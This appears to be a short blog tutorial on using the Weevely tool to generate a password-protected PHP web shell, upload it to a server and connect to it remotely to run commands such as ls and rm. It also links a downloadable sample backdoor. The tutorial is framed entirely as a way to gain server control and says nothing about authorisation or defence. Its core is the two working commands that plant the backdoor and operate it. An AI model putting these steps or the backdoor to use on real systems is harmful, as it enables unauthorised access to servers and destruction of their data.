How to Gain Server Control Using Weevely Backdoor

Project URL:

https://github.com/epinna/weevely3

Weevely is a web shell generation tool (PHP only). It can generate PHP backdoor programs to gain server access.

This example uses Kali Linux. For other systems, install the tool first, then follow along:

Generate a file (using “test” as the password here):

weevely generate test ~/test.php

 

Copy it down, save it as a PHP file, and upload it to the server. This example uses t.php as the filename (see attachment for a sample file).

Use the following command locally to connect to the remote host (replace the URL with the actual address):
 

weevely http://192.168.1.100/t.php test


 

At this point, you can use common commands like ls, rm, etc. to manipulate files on the server.

 

Attachment Download https://www.cnop.net/uploadfile/2020/0324/20200324033904986.zip

Leave a Comment

Your email address will not be published.